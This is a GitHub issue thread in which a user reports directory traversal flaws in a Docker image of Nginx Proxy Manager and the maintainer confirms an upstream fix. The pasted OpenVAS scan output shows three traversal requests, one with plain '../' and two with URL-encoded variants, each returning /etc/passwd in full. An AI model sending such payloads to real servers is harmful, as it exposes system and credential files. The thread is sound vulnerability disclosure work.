### ISSUE TITLE
Security Issue: directory traversal vulnerabilities

### ISSUE THREAD

**Issue by KillSwitchIO** [jlesage/docker-nginx-proxy-manager#8]
Stood up container and ran OpenVAS against it. Showed a directory traversal issue.

Vulnerability Detection Result

The following traversal URL(s) where found:

Vulnerable url: http://test.com:8181/../../../../../../etc/passwd

Request:
GET /../../../../../../etc/passwd HTTP/1.1 
Connection: Close 
Host: test.com:8181 
Pragma: no-cache 
Cache-Control: no-cache 
User-Agent: Mozilla/5.0 [en] (X11, U; GBN-VT 9.0.3) 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* 
Accept-Language: en 
Accept-Charset: iso-8859-1,*,utf-8 
 

Response:
HTTP/1.1 200 OK 
Strict-Transport-Security: includeSubDomains; max-age=631138519; preload 
X-XSS-Protection: 0 
X-Content-Type-Options: nosniff 
X-Frame-Options: DENY 
Cache-Control: no-cache, no-store, max-age=0, must-revalidate 
Pragma: no-cache 
Expires: 0 
Content-Type: text/html; charset=utf-8 
Vary: Accept-Encoding 
Date: Sun, 31 Mar 2019 18:58:05 GMT 
Connection: close 
Transfer-Encoding: chunked 
 
 
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
app:x:99:100::/dev/null:/sbin/nologin

Vulnerable url: http://test.com:8181/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd

Request:
GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd HTTP/1.1 
Connection: Close 
Host: test.com:8181 
Pragma: no-cache 
Cache-Control: no-cache 
User-Agent: Mozilla/5.0 [en] (X11, U; GBN-VT 9.0.3) 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* 
Accept-Language: en 
Accept-Charset: iso-8859-1,*,utf-8 
 

Response:
HTTP/1.1 200 OK 
Strict-Transport-Security: includeSubDomains; max-age=631138519; preload 
X-XSS-Protection: 0 
X-Content-Type-Options: nosniff 
X-Frame-Options: DENY 
Cache-Control: no-cache, no-store, max-age=0, must-revalidate 
Pragma: no-cache 
Expires: 0 
Content-Type: text/html; charset=utf-8 
Vary: Accept-Encoding 
Date: Sun, 31 Mar 2019 18:58:05 GMT 
Connection: close 
Transfer-Encoding: chunked 
 
 
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
app:x:99:100::/dev/null:/sbin/nologin

Vulnerable url: http://test.com:8181/..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

Request:
GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 
Connection: Close 
Host: test.com:8181 
Pragma: no-cache 
Cache-Control: no-cache 
User-Agent: Mozilla/5.0 [en] (X11, U; GBN-VT 9.0.3) 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* 
Accept-Language: en 
Accept-Charset: iso-8859-1,*,utf-8 
 

Response:
HTTP/1.1 200 OK 
Strict-Transport-Security: includeSubDomains; max-age=631138519; preload 
X-XSS-Protection: 0 
X-Content-Type-Options: nosniff 
X-Frame-Options: DENY 
Cache-Control: no-cache, no-store, max-age=0, must-revalidate 
Pragma: no-cache 
Expires: 0 
Content-Type: text/html; charset=utf-8 
Vary: Accept-Encoding 
Date: Sun, 31 Mar 2019 18:58:05 GMT 
Connection: close 
Transfer-Encoding: chunked 
 
 
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
app:x:99:100::/dev/null:/sbin/nologin

Solution

Solution type: Mitigation Mitigation

Contact the vendor for a solution.
Vulnerability Detection Method

Sends crafted HTTP requests and checks the response.

Details: Generic HTTP Directory Traversal (OID: 1.3.6.1.4.1.25623.1.0.106756)

Version used: $Revision: 12019 $

**Comment by KillSwitchIO** [comment]
In addition:
Summary

This host is running the Allaire JRun web server. Versions 2.3.3, 3.0, and 3.1 are vulnerable to a directory traversal attack.
Vulnerability Detection Result

Vulnerable url: http://test.com:8181/../../../../../../../../etc/passwd

Solution

Solution type: VendorFix VendorFix

The vendor has addressed this issue in Macromedia Product Security Bulletin MPSB01-17. Please upgrade to the latest version of JRun.

**Comment by jlesage** [comment]
Thanks for submitting.  I submitted a fix to the upstream: https://github.com/jc21/nginx-proxy-manager/pull/114

**Comment by jlesage** [comment]
Fixed with the latest docker image version.

**Comment by KillSwitchIO** [comment]
Thanks! I love Git and communities.
